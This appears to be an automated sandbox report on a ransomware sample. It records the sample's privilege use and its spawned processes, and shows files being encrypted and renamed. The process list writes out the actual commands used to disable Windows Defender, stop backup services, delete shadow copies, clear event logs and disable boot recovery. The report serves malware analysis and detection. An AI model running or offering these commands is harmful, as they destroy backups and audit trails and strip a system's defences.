| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe
"C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\JPjx_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/240-54-0x000007FEFC331000-0x000007FEFC333000-memory.dmp
memory/2080-58-0x000007FEF3990000-0x000007FEF44ED000-memory.dmp
memory/2080-59-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp
memory/2080-60-0x0000000002690000-0x0000000002692000-memory.dmp
memory/2080-61-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp
memory/2080-62-0x0000000002692000-0x0000000002694000-memory.dmp
memory/2080-63-0x0000000002694000-0x0000000002697000-memory.dmp
memory/2080-64-0x000000001B730000-0x000000001BA2F000-memory.dmp
memory/2080-65-0x000000000269B000-0x00000000026BA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2057eb96bec135be8837ae1c06d690cd |
| SHA1 | 7338c0d78bfa530d95972b5e8f929ad72fb96e76 |
| SHA256 | 5219d7a72d4e31ce477b407acac0bbf6dc0740faa5504e8a8a5033db2004898b |
| SHA512 | 3f99ec239b619d52c6a8b0204642a2e0b448c25b9cbdd72db2b14300f9ee552cd596c2a0205462184de288e00a1dc0b2d6af6a14bc0fb1989daafc31f9d5bf2a |
memory/2180-68-0x000007FEF2FF0000-0x000007FEF3B4D000-memory.dmp
memory/2180-69-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
memory/2180-72-0x00000000029DB000-0x00000000029FA000-memory.dmp
memory/2180-71-0x00000000029D4000-0x00000000029D7000-memory.dmp
memory/2180-70-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
C:\JPjx_HOW_TO_DECRYPT.txt
| MD5 | 033e7a5b6b35dee5b4c7095f87fadce7 |
| SHA1 | ea860a57baa649fd49c99db6ebe42e50b93cb3a6 |
| SHA256 | d6ee6632a475bb56c9901d51433a559799da80ab21560328190e9d5ece969d19 |
| SHA512 | 36dd4a2521c9345c6d13c5d8673008c2d1973a50f46c43146c24bf60cee40b85d96059687514116745f2dd807d6c57d3abc84f29b108205f65c877437e04face |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-04 13:56
Reported
2022-03-04 13:58
Platform
win10v2004-en-20220113
Max time kernel
152s
Max time network
141s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\ApproveUnblock.crw.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_GgAAABoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompleteApprove.tif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FindInstall.tif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StepSkip.png => C:\Users\Admin\Pictures\StepSkip.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\StepSkip.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UndoTrace.png => C:\Users\Admin\Pictures\UndoTrace.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ApproveUnblock.crw => C:\Users\Admin\Pictures\ApproveUnblock.crw.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_GgAAABoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FindInstall.tif => C:\Users\Admin\Pictures\FindInstall.tif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UndoTrace.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompleteApprove.tif => C:\Users\Admin\Pictures\CompleteApprove.tif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-lightunplated_devicefamily-colorfulunplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTrial-ul-oob.xrm-ms.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_FgAAABYAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\LargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupWideTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-48_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-80_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\WinRTUtils.winmd | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Bark.jpg | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeMedTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-16_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\es-ES\iexplore.exe.mui.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\br.txt.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_KAAAACgAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-execution.xml.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-ppd.xrm-ms.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_OgAAADoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_FAAAABQAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-phn.xrm-ms.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_DgAAAA4AAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTile.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
